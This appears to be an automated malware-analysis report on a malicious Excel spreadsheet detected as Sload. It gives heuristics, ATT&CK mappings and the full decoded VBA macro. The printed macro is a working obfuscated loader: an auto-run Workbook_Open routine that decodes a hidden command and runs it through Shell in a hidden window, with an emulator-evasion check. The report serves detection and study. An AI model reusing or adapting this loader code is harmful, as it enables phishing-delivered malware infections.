MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing a Workbook_Open VBA macro. This macro executes obfuscated VBA code which, based on the Shell() call heuristic, likely downloads and executes a second-stage payload. The ClamAV signature 'Xls.Malware.Sload-6786370-0' further confirms its malicious nature. The VBA code is heavily obfuscated, making it difficult to determine the exact download URL or execution method without further dynamic analysis.
Heuristics 6
-
ClamAV: Xls.Malware.Sload-6786370-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Sload-6786370-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.day.com/dam/1.0 In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4054 bytes |
SHA-256: 5918085136bf04836ee55b7cdfde877eaf0709e92a76ca7485b31452c744f946 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
pex2 = "pex2"
pex = top(pex2)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "coprocessor"
Function top(PEXCEPTION_POINTERS)
ucontext_t.CmdLineParser = PEXCEPTION_POINTERS
End Function
Attribute VB_Name = "CYGWIN"
Function ULONG()
ucontext_t.malloc = a("m(j4)m4fdyuihzuvv4[]fdyuihzuvv4[[ka'mosd'4""u$}hois'l.4,hsbuodogv{\$'uy:d""xumo4hphou(-'uo-yu""mvsu'o{-jdy'vdgjksvu$,hsbuodogv%]] o(f _tdkoygiu-unu]]{|hogio:fidmuhh4]] o(f _tdkoygiu-unu]]|;oip\""u$]]zoof3))""mlkv-md()hj'-aty]]{;mgomz\""u$]]zoof3))a""us'm-md()hj'-aty]]{;][[424dao:ksvu4:u'mdjs'l4ghmss4:ksvufgoz4 o(f _tttttttttttttttttttt-""go|4hogio:fidmuhh4] o(f _tttttttttttttttttttt-""go]4:ys'jdyhopvu4zsjju'[")
dwVar = 2
On Error Resume Next
dwVar = CInt("30E+10000")
If dwVar = 2 Then
ucontext_t.signo = ucontext_t.malloc
End If
ULONG = 1
End Function
Attribute VB_Name = "specific"
Function a(NO_UNIX_BACKTRACE_SUPPORT)
further = ""
SIGFPE = 1
DWORD64 SIGFPE, further, NO_UNIX_BACKTRACE_SUPPORT
a = further
End Function
Function DWORD64(ByRef redistribute, ByRef low, mytstack)
licenses = Len(mytstack)
If redistribute <= licenses Then
low = low + up(Software(Right(Left(mytstack, redistribute), 1)), 4)
redistribute = redistribute + 1
DWORD64 redistribute, low, mytstack
End If
End Function
Function up(printing, settings)
If printing - settings < 1 Then
up = Right(Left(ucontext_t.SIGBUS, Len(ucontext_t.SIGBUS) + printing - settings), 1)
Else
up = Right(Left(ucontext_t.SIGBUS, printing - settings), 1)
End If
End Function
Function Software(fprintf)
bStackBelowHeap = 1
Windows1 = 1
strings bStackBelowHeap, Windows1, fprintf
Software = Windows1
End Function
Function strings(ByRef bStackBelowHeap, ByRef Windows, fprintf)
UNUSED = ucontext_t.SIGBUS
licenses = Len(UNUSED)
If bStackBelowHeap < licenses Then
If fprintf <> Right(Left(UNUSED, bStackBelowHeap), 1) Then
bStackBelowHeap = bStackBelowHeap + 1
strings bStackBelowHeap, Windows, fprintf
Else
Windows = bStackBelowHeap
End If
End If
End Function
Attribute VB_Name = "ucontext_t"
Attribute VB_Base = "0{08B9E9C0-6FFB-4718-8161-A87BACED206B}{A9B41FEF-6FD0-4F2E-9396-9B344E544D11}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub signo_Change()
without = ucontext_t.signo
dwVar = 100
dwVar = 99
dwVar = 98
dwVar = 97
dwVar = 96
dwVar = 95
dwVar = 94
dwVar = 93
dwVar = 92
dwVar = 91
dwVar = 90
dwVar = 89
dwVar = 88
dwVar = 87
dwVar = 86
dwVar = 85
dwVar = 84
dwVar = 83
dwVar = 82
dwVar = 81
dwVar = 80
dwVar = 79
dwVar = 78
dwVar = 0
Shell without, 0
End Sub
Private Sub CmdLineParser_Change()
ULONG
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.